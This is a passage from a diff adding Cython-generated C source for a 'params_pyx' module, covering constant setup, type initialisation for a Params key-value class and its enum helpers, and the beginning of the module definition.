__repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_codeobj__14 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_str, 41, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__14)) __PYX_ERR(1, 41, __pyx_L1_error) + + /* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_codeobj__15 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__9, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_new, 49, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__15)) __PYX_ERR(1, 49, __pyx_L1_error) + __pyx_tuple__16 = PyTuple_Pack(1, ((PyObject *)Py_None)); if (unlikely(!__pyx_tuple__16)) __PYX_ERR(1, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__16); + __Pyx_GIVEREF(__pyx_tuple__16); + + /* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_codeobj__17 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_repr, 62, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__17)) __PYX_ERR(1, 62, __pyx_L1_error) + + /* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_codeobj__18 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_str, 64, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__18)) __PYX_ERR(1, 64, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_tuple__19 = PyTuple_Pack(5, __pyx_n_s_pyx_type, __pyx_n_s_pyx_checksum, __pyx_n_s_pyx_state, __pyx_n_s_pyx_PickleError, __pyx_n_s_pyx_result); if (unlikely(!__pyx_tuple__19)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__19); + __Pyx_GIVEREF(__pyx_tuple__19); + __pyx_codeobj__20 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__19, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__20)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "common/params_pyx.pyx":29 + * + * + * def ensure_bytes(v): # <<<<<<<<<<<<<< + * return v.encode() if isinstance(v, str) else v; + * + */ + __pyx_tuple__22 = PyTuple_Pack(1, __pyx_n_s_v); if (unlikely(!__pyx_tuple__22)) __PYX_ERR(0, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__22); + __Pyx_GIVEREF(__pyx_tuple__22); + __pyx_codeobj__23 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__22, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_ensure_bytes, 29, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__23)) __PYX_ERR(0, 29, __pyx_L1_error) + + /* "common/params_pyx.pyx":46 + * del self.p + * + * def clear_all(self, tx_type=ParamKeyType.ALL): # <<<<<<<<<<<<<< + * self.p.clearAll(tx_type) + * + */ + __pyx_tuple__24 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_tx_type); if (unlikely(!__pyx_tuple__24)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__24); + __Pyx_GIVEREF(__pyx_tuple__24); + __pyx_codeobj__25 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__24, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_clear_all, 46, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__25)) __PYX_ERR(0, 46, __pyx_L1_error) + + /* "common/params_pyx.pyx":49 + * self.p.clearAll(tx_type) + * + * def check_key(self, key): # <<<<<<<<<<<<<< + * key = ensure_bytes(key) + * if not self.p.checkKey(key): + */ + __pyx_tuple__26 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_key); if (unlikely(!__pyx_tuple__26)) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__26); + __Pyx_GIVEREF(__pyx_tuple__26); + __pyx_codeobj__27 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__26, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_check_key, 49, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__27)) __PYX_ERR(0, 49, __pyx_L1_error) + + /* "common/params_pyx.pyx":55 + * return key + * + * def get(self, key, bool block=False, encoding=None): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef string val + */ + __pyx_tuple__28 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_key, __pyx_n_s_block, __pyx_n_s_encoding, __pyx_n_s_k, __pyx_n_s_val); if (unlikely(!__pyx_tuple__28)) __PYX_ERR(0, 55, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__28); + __Pyx_GIVEREF(__pyx_tuple__28); + __pyx_codeobj__29 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__28, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_get, 55, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__29)) __PYX_ERR(0, 55, __pyx_L1_error) + __pyx_tuple__30 = PyTuple_Pack(2, Py_False, Py_None); if (unlikely(!__pyx_tuple__30)) __PYX_ERR(0, 55, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__30); + __Pyx_GIVEREF(__pyx_tuple__30); + + /* "common/params_pyx.pyx":71 + * return val if encoding is None else val.decode(encoding) + * + * def get_bool(self, key, bool block=False): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef bool r + */ + __pyx_tuple__31 = PyTuple_Pack(5, __pyx_n_s_self, __pyx_n_s_key, __pyx_n_s_block, __pyx_n_s_k, __pyx_n_s_r); if (unlikely(!__pyx_tuple__31)) __PYX_ERR(0, 71, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__31); + __Pyx_GIVEREF(__pyx_tuple__31); + __pyx_codeobj__32 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__31, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_get_bool, 71, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__32)) __PYX_ERR(0, 71, __pyx_L1_error) + __pyx_tuple__33 = PyTuple_Pack(1, Py_False); if (unlikely(!__pyx_tuple__33)) __PYX_ERR(0, 71, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__33); + __Pyx_GIVEREF(__pyx_tuple__33); + + /* "common/params_pyx.pyx":78 + * return r + * + * def put(self, key, dat): # <<<<<<<<<<<<<< + * """ + * Warning: This function blocks until the param is written to disk! + */ + __pyx_tuple__34 = PyTuple_Pack(5, __pyx_n_s_self, __pyx_n_s_key, __pyx_n_s_dat, __pyx_n_s_k, __pyx_n_s_dat_bytes); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__34); + __Pyx_GIVEREF(__pyx_tuple__34); + __pyx_codeobj__35 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__34, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_put, 78, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__35)) __PYX_ERR(0, 78, __pyx_L1_error) + + /* "common/params_pyx.pyx":90 + * self.p.put(k, dat_bytes) + * + * def put_bool(self, key, bool val): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + __pyx_tuple__36 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_key, __pyx_n_s_val, __pyx_n_s_k); if (unlikely(!__pyx_tuple__36)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__36); + __Pyx_GIVEREF(__pyx_tuple__36); + __pyx_codeobj__37 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__36, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_put_bool, 90, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__37)) __PYX_ERR(0, 90, __pyx_L1_error) + + /* "common/params_pyx.pyx":95 + * self.p.putBool(k, val) + * + * def remove(self, key): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + __pyx_tuple__38 = PyTuple_Pack(3, __pyx_n_s_self, __pyx_n_s_key, __pyx_n_s_k); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(0, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__38); + __Pyx_GIVEREF(__pyx_tuple__38); + __pyx_codeobj__39 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__38, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_remove, 95, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__39)) __PYX_ERR(0, 95, __pyx_L1_error) + + /* "common/params_pyx.pyx":100 + * self.p.remove(k) + * + * def get_param_path(self, key=""): # <<<<<<<<<<<<<< + * cdef string key_bytes = ensure_bytes(key) + * return self.p.getParamPath(key_bytes).decode("utf-8") + */ + __pyx_tuple__40 = PyTuple_Pack(3, __pyx_n_s_self, __pyx_n_s_key, __pyx_n_s_key_bytes); if (unlikely(!__pyx_tuple__40)) __PYX_ERR(0, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__40); + __Pyx_GIVEREF(__pyx_tuple__40); + __pyx_codeobj__41 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__40, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_get_param_path, 100, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__41)) __PYX_ERR(0, 100, __pyx_L1_error) + __pyx_tuple__42 = PyTuple_Pack(1, __pyx_kp_u_); if (unlikely(!__pyx_tuple__42)) __PYX_ERR(0, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__42); + __Pyx_GIVEREF(__pyx_tuple__42); + + /* "common/params_pyx.pyx":104 + * return self.p.getParamPath(key_bytes).decode("utf-8") + * + * def all_keys(self): # <<<<<<<<<<<<<< + * return self.p.allKeys() + * + */ + __pyx_codeobj__43 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_all_keys, 104, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__43)) __PYX_ERR(0, 104, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__44 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__44)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_codeobj__45 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__7, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__45)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "common/params_pyx.pyx":107 + * return self.p.allKeys() + * + * def put_nonblocking(key, val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + */ + __pyx_tuple__46 = PyTuple_Pack(3, __pyx_n_s_key, __pyx_n_s_val, __pyx_n_s_d); if (unlikely(!__pyx_tuple__46)) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__46); + __Pyx_GIVEREF(__pyx_tuple__46); + __pyx_codeobj__47 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__46, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_put_nonblocking, 107, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__47)) __PYX_ERR(0, 107, __pyx_L1_error) + __pyx_tuple__48 = PyTuple_Pack(1, ((PyObject*)__pyx_kp_u_)); if (unlikely(!__pyx_tuple__48)) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__48); + __Pyx_GIVEREF(__pyx_tuple__48); + + /* "common/params_pyx.pyx":110 + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + * def put_bool_nonblocking(key, bool val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() + */ + __pyx_codeobj__49 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__46, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_params_pyx_pyx, __pyx_n_s_put_bool_nonblocking, 110, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__49)) __PYX_ERR(0, 110, __pyx_L1_error) + __pyx_tuple__50 = PyTuple_Pack(1, ((PyObject*)__pyx_kp_u_)); if (unlikely(!__pyx_tuple__50)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__50); + __Pyx_GIVEREF(__pyx_tuple__50); + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + __pyx_umethod_PyDict_Type_get.type = (PyObject*)&PyDict_Type; + __pyx_umethod_PyDict_Type_get.method_name = &__pyx_n_s_get; + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_222419149 = PyInt_FromLong(222419149L); if (unlikely(!__pyx_int_222419149)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_228825662 = PyInt_FromLong(228825662L); if (unlikely(!__pyx_int_228825662)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_238750788 = PyInt_FromLong(238750788L); if (unlikely(!__pyx_int_238750788)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + return 0; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_OrderedDict = Py_None; Py_INCREF(Py_None); + __Pyx_EnumBase = Py_None; Py_INCREF(Py_None); + __Pyx_FlagBase = Py_None; Py_INCREF(Py_None); + __Pyx_globals = ((PyObject*)Py_None); Py_INCREF(Py_None); + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6common_10params_pyx_Params = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6common_10params_pyx_Params_spec, NULL); if (unlikely(!__pyx_ptype_6common_10params_pyx_Params)) __PYX_ERR(0, 35, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6common_10params_pyx_Params_spec, __pyx_ptype_6common_10params_pyx_Params) < 0) __PYX_ERR(0, 35, __pyx_L1_error) + #else + __pyx_ptype_6common_10params_pyx_Params = &__pyx_type_6common_10params_pyx_Params; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6common_10params_pyx_Params) < 0) __PYX_ERR(0, 35, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6common_10params_pyx_Params->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6common_10params_pyx_Params->tp_dictoffset && __pyx_ptype_6common_10params_pyx_Params->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6common_10params_pyx_Params->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_Params, (PyObject *) __pyx_ptype_6common_10params_pyx_Params) < 0) __PYX_ERR(0, 35, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6common_10params_pyx_Params) < 0) __PYX_ERR(0, 35, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking_spec, NULL); if (unlikely(!__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking)) __PYX_ERR(0, 107, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking_spec, __pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking) < 0) __PYX_ERR(0, 107, __pyx_L1_error) + #else + __pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking = &__pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking) < 0) __PYX_ERR(0, 107, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking->tp_dictoffset && __pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; + } + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking_spec, NULL); if (unlikely(!__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking)) __PYX_ERR(0, 110, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking_spec, __pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking) < 0) __PYX_ERR(0, 110, __pyx_L1_error) + #else + __pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking = &__pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking) < 0) __PYX_ERR(0, 110, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking->tp_dictoffset && __pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; + } + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_t_1 = PyTuple_Pack(1, (PyObject *)(&PyType_Type)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype___Pyx_EnumMeta = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__Pyx_EnumMeta_spec, __pyx_t_1); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_ptype___Pyx_EnumMeta)) __PYX_ERR(1, 16, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__Pyx_EnumMeta_spec, __pyx_ptype___Pyx_EnumMeta) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + #else + __pyx_ptype___Pyx_EnumMeta = &__Pyx_EnumMeta; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_ptype___Pyx_EnumMeta->tp_dealloc = (&PyType_Type)->tp_dealloc; + __pyx_ptype___Pyx_EnumMeta->tp_base = (&PyType_Type); + __pyx_ptype___Pyx_EnumMeta->tp_new = (&PyType_Type)->tp_new; + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype___Pyx_EnumMeta) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype___Pyx_EnumMeta->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype___Pyx_EnumMeta->tp_dictoffset && __pyx_ptype___Pyx_EnumMeta->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype___Pyx_EnumMeta->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype___Pyx_EnumMeta) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_params_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_params_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "params_pyx", + 0, /* m_doc */ + #if 